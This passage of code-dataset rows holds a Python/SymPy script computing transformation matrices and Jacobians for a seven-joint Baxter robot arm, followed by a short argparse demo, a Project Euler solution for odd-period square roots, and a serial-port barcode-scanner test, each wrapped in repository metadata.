sy.sin(q3(t))\n c4 = sy.cos(q4(t))\n s4 = sy.sin(q4(t))\n c5 = sy.cos(q5(t))\n s5 = sy.sin(q5(t))\n c6 = sy.cos(q6(t))\n s6 = 
sy.sin(q6(t))\n c7 = sy.cos(q7(t))\n s7 = sy.sin(q7(t))\n\n # ジョイント角度ベクトル\n q = sy.Matrix([[q1(t), q2(t), q3(t), q4(t), q5(t), q6(t), q7(t)]]).T\n\n\n\n\n# 同時変換行列\n\n# 直書き\n# T_Wo_BL = sy.Matrix([[math.sqrt(2) / 2, math.sqrt(2) / 2, 0, L],\n# [-math.sqrt(2) / 2, math.sqrt(2) / 2, 0, -h],\n# [0, 0, 1, H],\n# [0, 0, 0, 1]])\n\n# 直書きじゃない\nT_Wo_BL = sy.Matrix([[c0, s0, 0, L],\n [-s0, c0, 0, -h],\n [0, 0, 1, H],\n [0, 0, 0, 1]])\n\nT_BL_0 = sy.Matrix([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, L0],\n [0, 0, 0, 1]])\n\nT_0_1 = sy.Matrix([[c1, -s1, 0, 0],\n [s1, c1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n\nT_1_2 = sy.Matrix([[-s2, -c2, 0, L1],\n [0, 0, 1, 0],\n [-c2, s2, 0, 0],\n [0, 0, 0, 1]])\n\nT_2_3 = sy.Matrix([[c3, -s3, 0, 0],\n [0, 0, -1, -L2],\n [s3, c3, 0, 0],\n [0, 0, 0, 1]])\n\nT_3_4 = sy.Matrix([[c4, -s4, 0, L3],\n [0, 0, 1, 0],\n [-s4, -c4, 0, 0],\n [0, 0, 0, 1]])\n\nT_4_5 = sy.Matrix([[c5, -s5, 0, 0],\n [0, 0, -1, -L4],\n [s5, c5, 0, 0],\n [0, 0, 0, 1]])\n\nT_5_6 = sy.Matrix([[c6, -s6, 0, L5],\n [0, 0, 1, 0],\n [-s6, -c6, 0, 0],\n [0, 0, 0, 1]])\n\nT_6_7 = sy.Matrix([[c7, -s7, 0, 0],\n [0, 0, -1, 0],\n [s7, c7, 0, 0],\n [0, 0, 0, 1]])\n\nT_7_GL = sy.Matrix([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, L6],\n [0, 0, 0, 1]])\n\nT_0_7 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6 * T_6_7\nT_0_6 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6\nT_0_5 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5\nT_0_4 = T_0_1 * T_1_2 * T_2_3 * T_3_4\nT_0_3 = T_0_1 * T_1_2 * T_2_3\nT_0_2 = T_0_1 * T_1_2\n\n\n## 正しい\nT_Wo_BL = T_Wo_BL\nT_Wo_0 = T_Wo_BL * T_BL_0\nT_Wo_1 = T_Wo_BL * T_BL_0 * T_0_1\nT_Wo_2 = T_Wo_BL * T_BL_0 * T_0_2\nT_Wo_3 = T_Wo_BL * T_BL_0 * T_0_3\nT_Wo_4 = T_Wo_BL * T_BL_0 * T_0_4\nT_Wo_5 = T_Wo_BL * T_BL_0 * T_0_5\nT_Wo_6 = T_Wo_BL * T_BL_0 * T_0_6\nT_Wo_7 = T_Wo_BL * T_BL_0 * T_0_7\nT_Wo_GL = T_Wo_BL * T_BL_0 * T_0_7 * T_7_GL\n\nT_Wo_i_ = [T_Wo_BL, T_Wo_0, T_Wo_1, T_Wo_2, T_Wo_3, T_Wo_4, T_Wo_5, T_Wo_6, T_Wo_7, T_Wo_GL]\nT_Wo_i = [sy.simplify(T) for T in 
T_Wo_i_]\n\n### ヤコビ行列を計算 ###\n\njacobi_alpha_x = []\njacobi_alpha_y = []\njacobi_alpha_z = []\njacobi_origin = []\n\nfor T in T_Wo_i:\n Jax = T[0:3, 0:1].jacobian(q)\n Jay = T[0:3, 1:2].jacobian(q)\n Jaz = T[0:3, 2:3].jacobian(q)\n Jo = T[0:3, 3:4].jacobian(q)\n \n jacobi_alpha_x.append(sy.simplify(Jax))\n jacobi_alpha_y.append(sy.simplify(Jay))\n jacobi_alpha_z.append(sy.simplify(Jaz))\n jacobi_origin.append(sy.simplify(Jo))\n\nif not t_independent: #qが時間依存のとき\n djacobi_alpha_x = []\n djacobi_alpha_y = []\n djacobi_alpha_z = []\n djacobi_origin = []\n \n for Jax, Jay, Jaz, Jo in zip(jacobi_alpha_x, jacobi_alpha_y, jacobi_alpha_z, jacobi_origin):\n dJax = sy.diff(Jax, t)\n dJay = sy.diff(Jay, t)\n dJaz = sy.diff(Jaz, t)\n dJo = sy.diff(Jo, t)\n dJs = [dJax, dJay, dJaz, dJo]\n \n dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7')\n for i, dJ in enumerate(dJs):\n dJs[i] = dJ.subs([\n (sy.Derivative(q1(t), t), dq1),\n (sy.Derivative(q2(t), t), dq2),\n (sy.Derivative(q3(t), t), dq3),\n (sy.Derivative(q4(t), t), dq4),\n (sy.Derivative(q5(t), t), dq5),\n (sy.Derivative(q6(t), t), dq6),\n (sy.Derivative(q7(t), t), dq7),\n ])\n \n djacobi_alpha_x.append(sy.simplify(dJax))\n djacobi_alpha_y.append(sy.simplify(dJay))\n djacobi_alpha_z.append(sy.simplify(dJaz))\n djacobi_origin.append(sy.simplify(dJo))\n\n\n\n# txt出力\n# f = open('baxter_hoge.txt', 'w')\n# for i, T in enumerate(T_Wo_i):\n# s = '\\nT' + str(i) + '='\n# f.write(s)\n# f.write(pycode(T))\n# for i, j in enumerate(jacobi_alpha_x):\n# s = '\\njax' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n# for i, j in enumerate(jacobi_alpha_y):\n# s = '\\njay' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n# for i, j in enumerate(jacobi_alpha_z):\n# s = '\\njaz' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n# for i, j in enumerate(jacobi_origin):\n# s = '\\njo' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n\n# f.close()\n\nf = open('baxter_hoge_dt.txt', 'w')\nfor i, j in 
enumerate(djacobi_alpha_x):\n s = '\\ndjax' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\nfor i, j in enumerate(djacobi_alpha_y):\n s = '\\ndjay' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\nfor i, j in enumerate(djacobi_alpha_z):\n s = '\\ndjaz' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\nfor i, j in enumerate(djacobi_origin):\n s = '\\ndjo' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\n\nf.close()\n\n\n\n\n\n# # print(\"r_bar_Wo_BL = \", T_Wo_BL[0:3, 3:4])\n# # print(\"r_bar_Wo_0 = \", T_Wo_0[0:3, 3:4])\n# # print(\"r_bar_Wo_1 = \", T_Wo_1[0:3, 3:4])\n# # print(\"r_bar_Wo_2 = \", T_Wo_2[0:3, 3:4])\n# # print(\"r_bar_Wo_3 = \", T_Wo_3[0:3, 3:4])\n# # print(\"r_bar_Wo_4 = \", T_Wo_4[0:3, 3:4])\n# # print(\"r_bar_Wo_5 = \", T_Wo_5[0:3, 3:4])\n# # print(\"r_bar_Wo_6 = \", T_Wo_6[0:3, 3:4])\n# # print(\"r_bar_Wo_7 = \", T_Wo_7[0:3, 3:4])\n# # print(\"r_bar_Wo_GL = \", T_Wo_GL[0:3, 3:4])\n\n# #print(\"orig = \", T_Wo_GL[0:1, 3:4])\n# #print(\"simp = \", sy.simplify(T_Wo_GL[0:1, 3:4]))\n\n# # 世界座標系から見た局所座標系の原点位置\n# r_Wo_BL = T_Wo_BL[0:3, 3:4]\n# r_Wo_0 = T_Wo_0[0:3, 3:4]\n# r_Wo_1 = T_Wo_1[0:3, 3:4]\n# r_Wo_2 = T_Wo_2[0:3, 3:4]\n# r_Wo_3 = T_Wo_3[0:3, 3:4]\n# r_Wo_4 = T_Wo_4[0:3, 3:4]\n# r_Wo_5 = T_Wo_5[0:3, 3:4]\n# r_Wo_6 = T_Wo_6[0:3, 3:4]\n# r_Wo_7 = T_Wo_7[0:3, 3:4]\n# r_Wo_GL = T_Wo_GL[0:3, 3:4]\n\n# r_Wo_BL = sy.simplify(r_Wo_BL)\n# r_Wo_0 = sy.simplify(r_Wo_0)\n# r_Wo_1 = sy.simplify(r_Wo_1)\n# r_Wo_2 = sy.simplify(r_Wo_2)\n# r_Wo_3 = sy.simplify(r_Wo_3)\n# r_Wo_4 = sy.simplify(r_Wo_4)\n# r_Wo_5 = sy.simplify(r_Wo_5)\n# r_Wo_6 = sy.simplify(r_Wo_6)\n# r_Wo_7 = sy.simplify(r_Wo_7)\n# r_Wo_GL = sy.simplify(r_Wo_GL)\n\n# # print(\"BL = \", r_Wo_BL)\n# # print(\"0 = \", r_Wo_0)\n# # print(\"1 = \", r_Wo_1)\n# # print(\"2 = \", r_Wo_2)\n# # print(\"3 = \", r_Wo_3)\n# # print(\"4 = \", r_Wo_4)\n# # print(\"5 = \", r_Wo_5)\n# # print(\"6 = \", r_Wo_6)\n# # print(\"7 = \", r_Wo_7)\n# # print(\"GL = \", r_Wo_GL)\n\n\n# jacobi_r_Wo_BL = 
sy.simplify(r_Wo_BL.jacobian(q))\n# jacobi_r_Wo_0 = sy.simplify(r_Wo_0.jacobian(q))\n# jacobi_r_Wo_1 = sy.simplify(r_Wo_1.jacobian(q))\n# jacobi_r_Wo_2 = sy.simplify(r_Wo_2.jacobian(q))\n# jacobi_r_Wo_3 = sy.simplify(r_Wo_3.jacobian(q))\n# jacobi_r_Wo_4 = sy.simplify(r_Wo_4.jacobian(q))\n# jacobi_r_Wo_5 = sy.simplify(r_Wo_5.jacobian(q))\n# jacobi_r_Wo_6 = sy.simplify(r_Wo_6.jacobian(q))\n# jacobi_r_Wo_7 = sy.simplify(r_Wo_7.jacobian(q))\n# jacobi_r_Wo_GL = sy.simplify(r_Wo_GL.jacobian(q))\n\n# # print(\"BL = \", jacobi_r_Wo_BL)\n# # print(\"0 = \", jacobi_r_Wo_0)\n# # print(\"1 = \", jacobi_r_Wo_1)\n# # print(\"2 = \", jacobi_r_Wo_2)\n# # print(\"3 = \", jacobi_r_Wo_3)\n# # print(\"4 = \", jacobi_r_Wo_4)\n# # print(\"5 = \", jacobi_r_Wo_5)\n# # print(\"6 = \", jacobi_r_Wo_6)\n# # print(\"7 = \", jacobi_r_Wo_7)\n# # print(\"GL = \", jacobi_r_Wo_GL)\n\n\n\n# djacobi_BL = sy.diff(jacobi_r_Wo_BL, t)\n# djacobi_0 = sy.diff(jacobi_r_Wo_0, t)\n# djacobi_1 = sy.diff(jacobi_r_Wo_1, t)\n# djacobi_2 = sy.diff(jacobi_r_Wo_2, t)\n# djacobi_3 = sy.diff(jacobi_r_Wo_3, t)\n# djacobi_4 = sy.diff(jacobi_r_Wo_4, t)\n# djacobi_5 = sy.diff(jacobi_r_Wo_5, t)\n# djacobi_6 = sy.diff(jacobi_r_Wo_6, t)\n# djacobi_7 = sy.diff(jacobi_r_Wo_7, t)\n# djacobi_GL = sy.diff(jacobi_r_Wo_GL, t)\n\n\n# # # dqを時間の変数にしたいとき\n# # dq1 = sy.Function(\"dq1\")\n# # dq2 = sy.Function(\"dq2\")\n# # dq3 = sy.Function(\"dq3\")\n# # dq4 = sy.Function(\"dq4\")\n# # dq5 = sy.Function(\"dq5\")\n# # dq6 = sy.Function(\"dq6\")\n# # dq7 = sy.Function(\"dq7\")\n\n# # djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # 
(sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # 
(sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n\n\n# # dqを時間に依らないとしたいとき\n# dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7')\n\n# djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7)])\n# djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), 
t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n\n\n\n# djacob_BL = sy.simplify(djacobi_BL)\n# djacob_0 = sy.simplify(djacobi_0)\n# djacob_1 = sy.simplify(djacobi_1)\n# djacob_2 = sy.simplify(djacobi_2)\n# djacob_3 = sy.simplify(djacobi_3)\n# djacob_4 = sy.simplify(djacobi_4)\n# djacob_5 = sy.simplify(djacobi_5)\n# djacob_6 = sy.simplify(djacobi_6)\n# djacob_7 = sy.simplify(djacobi_7)\n# djacob_GL = sy.simplify(djacobi_GL)\n\n\n# print(\"BL = \", djacobi_BL)\n# print(\"0 = \", djacobi_0)\n# print(\"1 = \", 
djacobi_1)\n# print(\"2 = \", djacobi_2)\n# print(\"3 = \", djacobi_3)\n# print(\"4 = \", djacobi_4)\n# print(\"5 = \", djacobi_5)\n# print(\"6 = \", djacobi_6)\n# print(\"7 = \", djacobi_7)\n# print(\"GL = \", djacobi_GL)\n\n"},"avg_line_length":{"kind":"number","value":37.332046332,"string":"37.332046"},"max_line_length":{"kind":"number","value":96,"string":"96"},"alphanum_fraction":{"kind":"number","value":0.4451339332,"string":"0.445134"}}},{"rowIdx":46396,"cells":{"hexsha":{"kind":"string","value":"b797229800135fc011bc9b38749536448f35264c"},"size":{"kind":"number","value":568,"string":"568"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Chapter5_Functions/Functions/command_line_arguments2.py"},"max_stars_repo_name":{"kind":"string","value":"kernbeisser/UdemyPythonPro"},"max_stars_repo_head_hexsha":{"kind":"string","value":"000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-12-28T23:43:35.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-01-01T18:34:18.000Z"},"max_issues_repo_path":{"kind":"string","value":"Chapter5_Functions/Functions/command_line_arguments2.py"},"max_issues_repo_name":{"kind":"string","value":"kernbeisser/UdemyPythonPro"},"max_issues_repo_head_hexsha":{"kind":"string","value":"000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Chapter5_Functions/Functions/command_line_arguments2.py"},"max_forks_repo_name":{"kind":"string","value":"kernbeisser/UdemyPythonPro"},"max_forks_repo_head_hexsha":{"kind":"string","value":"000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":9,"string":"9"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-09-26T19:29:28.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-02-07T06:41:00.000Z"},"content":{"kind":"string","value":"import argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--age', help='Enter your age (int)', type=int, required=True)\n parser.add_argument('--name', help='Enter your name (str)', type=str, required=True)\n parser.add_argument('--admin', help='Are your an admin? 
(bool)', type=bool, required=False)\n args = parser.parse_args()\n age = args.age\n name = args.name\n is_admin = args.admin\n print(age, type(age))\n print(name, type(name))\n print(is_admin, type(is_admin))\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":28.4,"string":"28.4"},"max_line_length":{"kind":"number","value":95,"string":"95"},"alphanum_fraction":{"kind":"number","value":0.6566901408,"string":"0.65669"}}},{"rowIdx":46397,"cells":{"hexsha":{"kind":"string","value":"b79b1b889b94911ce0e4e6155e66ab11d9bf5953"},"size":{"kind":"number","value":665,"string":"665"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Project Euler Qusetions 61 - 70/Project Euler Question 64.py"},"max_stars_repo_name":{"kind":"string","value":"Clayton-Threm/Coding-Practice"},"max_stars_repo_head_hexsha":{"kind":"string","value":"6671e8a15f9e797338caa617dae45093f4157bc1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-02-11T02:03:02.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2020-02-11T02:03:02.000Z"},"max_issues_repo_path":{"kind":"string","value":"Project Euler Qusetions 61 - 70/Project Euler Question 64.py"},"max_issues_repo_name":{"kind":"string","value":"Clayton-Threm/Coding-Practice"},"max_issues_repo_head_hexsha":{"kind":"string","value":"6671e8a15f9e797338caa617dae45093f4157bc1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Project Euler Qusetions 61 - 70/Project Euler Question 
64.py"},"max_forks_repo_name":{"kind":"string","value":"Clayton-Threm/Coding-Practice"},"max_forks_repo_head_hexsha":{"kind":"string","value":"6671e8a15f9e797338caa617dae45093f4157bc1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#Project Euler Question 64\n#Odd period square roots\n\nimport math\nimport decimal\n\ndecimal.getcontext().prec = 299\nodd_count = 0\nfor num in range(1, 10000):\n repeat_list = []\n x = decimal.Decimal(num).sqrt()\n x1 = decimal.Decimal(math.modf(x)[1])\n y = x\n y1 = x1\n if math.modf(y)[0] == 0:\n continue\n while True:\n y = decimal.Decimal((y - y1)) ** decimal.Decimal(-1)\n y1 = decimal.Decimal(math.modf(y)[1])\n y_check = str(y)[:10]\n if (y_check in repeat_list):\n break\n else:\n repeat_list.append(y_check)\n if (len(repeat_list) % 2 != 0):\n odd_count += 1\n \nprint (odd_count)"},"avg_line_length":{"kind":"number","value":23.75,"string":"23.75"},"max_line_length":{"kind":"number","value":60,"string":"60"},"alphanum_fraction":{"kind":"number","value":0.5744360902,"string":"0.574436"}}},{"rowIdx":46398,"cells":{"hexsha":{"kind":"string","value":"b7fab05c9e75761de2933e8475a2d68aab00c447"},"size":{"kind":"number","value":1579,"string":"1,579"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"showcase8/com/aaron/Serial_QR.py"},"max_stars_repo_name":{"kind":"string","value":"qsunny/python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"ace8c3178a9a9619de2b60ca242c2079dd2f825e"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"showcase8/com/aaron/Serial_QR.py"},"max_issues_repo_name":{"kind":"string","value":"qsunny/python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"ace8c3178a9a9619de2b60ca242c2079dd2f825e"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":2,"string":"2"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-03-25T22:00:07.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-01-20T15:51:48.000Z"},"max_forks_repo_path":{"kind":"string","value":"showcase8/com/aaron/Serial_QR.py"},"max_forks_repo_name":{"kind":"string","value":"qsunny/python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"ace8c3178a9a9619de2b60ca242c2079dd2f825e"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# -*- codiing:utf-8 -*-\n\"\"\"\nserial port test\n扫描枪测试:D 起动 E 结束\n\"\"\"\n__author__=\"aaron.qiu\"\n\nimport serial\nimport time\nimport string\nimport io\n\nif __name__ == \"__main__\":\n ser = serial.Serial()\n ser.port=\"COM2\"\n ser.baudrate=115200\n ser.stopbits=serial.STOPBITS_ONE\n ser.timeout=0\n ser.parity=serial.PARITY_NONE\n #ser.rtscts=1\n print(ser)\n\n try:\n '''ser = serial.Serial('COM2', 115200, timeout=0, parity=serial.PARITY_NONE, rtscts=1)'''\n ser.open()\n except Exception as e:\n print(\"error open serial port: \" + str(e))\n exit()\n\n if ser.isOpen():\n print(\"ready====\")\n try:\n #ser.flushInput() # flush input buffer, discarding all its contents\n #ser.flushOutput() # flush output 
buffer, aborting current output\n # and discard all that is in buffer\n\n # write data\n #ser.write(b\"D\")\n ser.write(b\"D\")\n print(\"write data: D\")\n\n time.sleep(0.5) # give the serial port sometime to receive the data\n\n numOfLines = 0\n\n while True:\n time.sleep(3)\n response = ser.readline()\n print(bytes.decode(response) )\n\n print(\"read data: \" + str(response, encoding = \"utf-8\"))\n\n numOfLines = numOfLines + 1\n\n if (numOfLines >= 10):\n break\n\n ser.close()\n except Exception as e1:\n print(\"error communicating...: \" + str(e1))\n\n else:\n print(\"cannot open serial port 